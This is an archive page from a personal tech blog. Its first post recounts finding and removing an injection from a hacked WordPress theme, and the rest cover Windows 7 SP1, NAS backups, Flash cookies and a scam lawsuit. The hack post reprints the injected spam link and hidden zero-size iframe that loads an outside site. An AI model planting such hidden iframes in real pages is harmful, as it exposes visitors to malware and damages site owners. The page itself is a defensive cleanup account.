Tag Archive: PC

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Securi shows my website to be okay now.  See screendump below.   I’ll be using Securi  a lot more!

Securi Site Check

Securi Site Check

Related Posts:

Comments are closed

Windows 7 SP1 Install

Windows 7 Service Pack 1 Install Experience


Windows 7 Ultimate with SP1

I installed Win7 sp1 on my PC last night after spotting it in the Windows Update list.  It’s been out since 16 Feb 2011 but I’ve only just noticed!  That’s the state of my PC in the screenshot.

Hitches

Everything installed really well, actually.  The downloads and install took about an hour and included updates for the Microsoft Mouse I use.  After the SP1 had installed, a few more “optional” updates appeared, so in they went as well!  The whole thing was much better than some earlier Microsoft service pack installs on Windows XP and 95 that I’ve done!

Impressions

The PC actually feels as if it’s running better.  More stable, nicer window & application opening.

Next…?

My next task is to update the Win7 32-bit install that I run in a virtual environment.  See  .  Watch this space!

Related Posts:

Comments are closed

What is the Best Backup for Windows in a Small Home or Office?

What is the Best Backup for Windows in a Small Home or Office?

Which Windows Backup?  A History.

Over the years I’ve tried many systems for backing up crucial Windows data.  Currently for small-scale backups I use the ubiquitous and almost bullet-proof flash drives, my current one tipping the scales at 8Gb.  But for major backups, as the years have passed, I’ve used;

  1. Floppy discs – 1.4Mb
  2. Iomega Zip discs – 100Mb
  3. CDRW – 650Mb
  4. DVD-R – 4.7Gb
  5. Western Digital My Book Home Edition – 1Tb

They all had their problems and limitations.  The last one looked good with Firewire, USB2, ethernet  & eSATA connections – but it overheated and broke…..

Best Windows Backup!

My current system is from Synology and is a “DS210j – Budget-friendly 2-bay NAS server for Home and Small Business”

See: http://www.synology.com/enu/products/DS210j/index.php

I can heartily recommend the thing.  It has so much gubbins within it and far exceeds my limited expectations.  I installed two green 2Tb drives from Western Digital  in mirrored RAID for security and use the auto-backup software provided as well as Windows’ own.  This is extremely relevant for the large number of hits I’ve had to this posting where a major part of the problem is the time taken to do a backup!  In my case, the 750Gb just takes a few hours to copy across the Gigabit speed ethernet that the unit can use.

Addendum June 2011: The tool is a seriously capable bit of kit and I cannot recommend it enough. Get one!

It does everything it says on the tin, and more!  The whole thing cost me about 200 quid, plus an hour of my time to install.

Even its firewall is more configurable than any router I’ve used!  It can be used as a server for FTP or the web.  It comes with software for a host of things that mimic Flikr etc but without all the privacy or security issues inherent in off-line storage.  It’ll also run with any operating system because it itself is a mini-linux installation as it is,  and includes Windows, Apple and Linux applications.
Check it out, straight from their overview page:

Build Your Entertainment Center

Download Station 2 functions as a 24×7 BitTorrent, FTP, HTTP, eMule, and NZB download center. RapidShare and RSS download are now supported.

DLNA Compliant Media Sever ensures compatibility and interoperability between Disk Station and a wide range of DLNA-certified home devices.

iTunes Server provides an easy way to share music and videos with other iTunes clients within the local network. You can create playlists with songs that match the criteria you specified, and best of all, iTunes will update these playlists automatically as you add or delete songs.

Audio Station supports music, Internet radio stations, and iPod playback with connected USB speakers. Web-streaming mode allows your music to be shared with multiple users over the Internet.

Back Up Your Precious Data

DSM 2.2 offers comprehensive solutions for you to back up data stored on Disk Station or your desktop computer to the Disk Station.

Server backup includes two alternatives: Network Backup and Local Backup. Both allow you to back up data in the shared folders and databases. Incremental backup option and flexible schedules are available. All can be easily configured with a step-by-step wizard.

Desktop backup provides Windows PC users with the Synology Data Replicator 3 for backing up desktop data, Outlook, and Outlook Express emails to their Disk Station by choosing one of the three backup modes: Immediate, Sync, and Scheduled backup, while Mac OS X users can use Apple Time Machine backup application to back up their critical data to Disk Station.

USBCopy allows you to quickly back up your data from an USB storage device such as an USB flash or USB card reader to the Disk Station with just one single touch on the front-panel Copy button.

Enrich Your Web Presence

Photo Station 3 simplifies photo, video, and blog sharing over the Internet. The flexibility of photo theme customization, blog layout arrangement, visitor’s privilege setting, RSS feed, and the dazzling 3-dimentional photo browsing with Cooliris make Photo Station 3 your state-of-the-art lifestyle sharing center on the Internet.

Web Station with built-in PHP+MySQL allows users to publish their own websites or install numerous popular open-source programs.

Access With Your iPhone/Mobile Device

The iPhone App DS audio allows Disk Station users to stream music stored on Disk Station with their iPhone/iPod® touch where Internet access is available, while DS photo allows uploading photos from the iPhone/iPod® touch to their Disk Station.

Users with a mobile device running on Windows Mobile® 6.0, iPhone OS 2.2.1 onward, or Symbian OS 9.1 can log on their Disk Station to view photos with Mobile Photo Station and read supported file formats with Mobile File Station where Internet access is available.

Eco Friendly

Eco Friendly

Synology Disk Station is designed and developed perpetually with the concept of energy saving. Compared with average PC counterparts, Synology Disk Station consumes a relatively low amount of power and has the HDDs hibernate when not in use. This not only helps to save energy but also extends the lifespan of the hard disk.

Synology Disk Station truly earns the title of “green product” because of the unique Scheduled Power On/Off feature, and the smart fan design effectively cools down the system with minimum power consumption, yet keeps the system quiet on operation.

Finally, all Synology products are produced with RoHS compliant parts and packed with recyclable packing materials. Synology recognizes its responsibility as a global citizen and is continually working to reduce the environmental impact of the products we create.

Related Posts:

Comments are closed

Google and GMail use LSO Super Cookies

LSO Super Cookies?  Well It was News to Me!

I this article in “Windows Secrets” by Woody Leonhard, Eliminate Flash-spawned ‘zombie’ cookies, he describes how they are generated as un-deletable cookies by Flash applications, which compromises user privacy, in the sense that they do stuff to your hard disc and network without your permission!

So What I Did

….was download and install the recommended Firefox add-on (Better Privacy) from here, https://addons.mozilla.org/en-US/firefox/addon/6623/

LSOs from Google being stored

LSOs from Google being stored

I then deleted all of the hundreds of LSOs from my hard-drive!

Then I fired up Firefox.

I then clicked on a Google bookmark, went to GMail and then got prompted by the Better Privacy tool that THREE LSOs had been dumped on my hard drive!  (see screenshot).

And I always thought Google web pages used ordinary cookies…?  After all, where’s the Flash on a simple Google page?

After all, the actual technical name for this poop dust is a Flash-spawned ‘zombie’ cookie! This is live tracking of LSOs in the tool, and it seriously slowed down the PC, so I’ve turned it off now.

What it Means

I think it’s time to look seriously at the problem, specifically things that Steve Jobs from Apple has being saying with regard to Adobe and their Flash application, Google and Microsoft.

In the past I’ve taken all his speeches with a pinch of salt because it always sounded like corporate jealousy and back-biting (his company being just as protectionist and restrictive as all the rest), but now it looks like he has a point.
The trouble is that the cat is already out of the bag and it looks like LSOs are being used as a lingering storage solution far removed from their Flash origins.

But what can I do?  After all,  I like using Google stuff!

What can YOU do?

Related Posts:

Pacific Webworks, Lawyers and Social Networking

Introduction

The last thing we need is more scummy scammers and following on from Google’s legal action against Pacific Webworks (PWW) one would naively have thought that the “business” folk would be more circumspect.  (See previous article and comments, http://strangelyperfect.tv/5146/more-on-google-profits-and-pacific-webworks/ )

At the beginning of June, it appeared that the Google case against PWW had fallen flat and that PWW had gotten away with it.  This certainly appears so from yesterday’s press announcement by the odious PWW management, such as here.  It says,

SALT LAKE CITY, Jun 28, 2010 (BUSINESS WIRE) — Pacific WebWorks, Inc.  today announced that a Stipulated Final Judgment and Order for Permanent Injunction was entered in the U.S. District Court for the District of Utah in the Google, Inc. vs. Pacific WebWorks, Inc. matter.

CEO Ken Bell commented, “We are very pleased to have this behind us. We have devoted a great deal of time and energy to resolving this situation and are anxious to return to the business of growing our company responsibly and profitably through our new marketing program. We appreciate our shareholders’ patience and understanding as we deal with the many details involved in the development and marketing of our products to small business users.”

Quite Bad

This looks quite bad until you realise that the PWW share price and dealing volumes have both fallen!

So what does the market know about the “settlement” that we don’t, eh?

Bloosky.com and The lawyer

PWW and Bloosky, were both named by Google, and Bloosky were (and still are) represented by Blair Jackson, who is a lawyer and on the company payroll of Bloosky in various positions.  (See at the bottom of here).

On checking out Mr Jackson, he’s part of:

CHRISTIANSEN & JACKSON, P.C.
10421 S. Jordan Gateway, Suite 600
South Jordan, Utah 84095
Telephone 801.576.2662
Facsimile 801.415.9340
Attorneys for Defendant Bloosky Interactive, LLC

You can see this on some delaying action in the Google case by Jackson for Bloosky, documents here and here.  But it gets better…   In this document, you’ll see that Bloosky are suing someone called Daniel L. Balsam for not adhering to an earlier agreement not to disclose what was said… or something. (I’ve yet to check this through!  But it looks a bit like pot-kettle-black to me…)

Whatever.

socialtoolkit.com

Yes. Whatever.  A bit more fishing on Jackson took me to the website(s) of one Vernon Howard.

He was scammed by socialtoolkit.com, in  exactly the same way as thousands of others were by Google Treasure Chest – promoted, run, designed and financed by Pacific Webworks.  It’s a scammers paradise with copious bad-web references and complaints.   The “business” says on it’s website,

Each day, more and more individuals, small business owners and Fortune 500 companies across the globe are realizing the value of SocialToolKit.com and choosing to increase their Social Networking efficiency, productivity and profits.   (Note to self:  “I must increase my Social Networking efficiency” – SP)

Here’s Vernon’s extremely well written story:

It’s an incredibly detailed tale, complete with copious screenshots, of his dealings with the various parties involved.  And he’s no shrinking violet.  He’s taking the buggers on!

There’s only one trouble.

He’s using Blair Jackson of Christiansen & Jackson, PC – Attorneys at Law, to take on socialtoolkit.com !!

How is this Weird?

Weird?  It’s positively scary!

Because if you read Vernon Howard’s account, you’ll see that he was billed by  YourProfitGateway.com

YourProfitGateway.com, when you check it’s (now freely accessible) WHOIS, unsurprisingly redirects to http://www.visualwebtools.com/site/

visualwebtools.com

If you’ve been following this, you’ll know from a while back that Visual WebTools is owned and run by…….. (trumpet fanfare)

Pacific WebWorks!

Latest News from The Visual WebTools Camp

Pacific WebWorks Updates Marketing Efforts

Thursday June 24, 2010 11:52:01 EDT SALT LAKE CITY, Jun 24, 2010

Last Thursday, this is what the odious CEO Ken Bell of PWW said about his company, their marketing and their product, Visual WebTools.

Pacific WebWorks, Inc., www.pacificwebworks.com, (OTCBB:PWEB) announced today that the company continues to perfect their new marketing program which offers prospective customers the opportunity to receive a tutorial on the product and interact with the company during the buying process.

CEO Ken Bell stated,

“Visual WebTools continues to be one of the premier online software products for small businesses in the marketplace. We expect our new, more interactive marketing approach to result in a more informed buyer who will be better equipped to employ our technologies into their online business. As a result, we expect future revenues to be more stable. We anticipate revenues to accelerate during the second half of the year with continued profitability.”

Bell continued,

“During the first six months of 2010 (i.e. since Google sued them – SP the company has focused on stabilizing profitability, servicing current customers and developing our new multi-tiered marketing program. We expect new customer acquisition in the future to be derived largely from our new direct contact marketing program. With our strong balance sheet, a current ratio in excess of 10x, tangible book value of nearly double our current market capitalization and strong historical earnings, we are positioned to continue to take advantage of opportunities in the marketplace.”

What are Google Doing?

The emphasis above, is mine.  From it, you can clearly see that Bell claims that his company is responsible for all the things that lead up to the nefarious practices that then lead to people being scammed.

So is the Google thing over with yet?  Why haven’t the Salt Lake Tribune said anything about it yet?

I still think there’s more to come out with this.  Remember the falling share price of PWW?  The markets know, you know.

Related Posts:

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me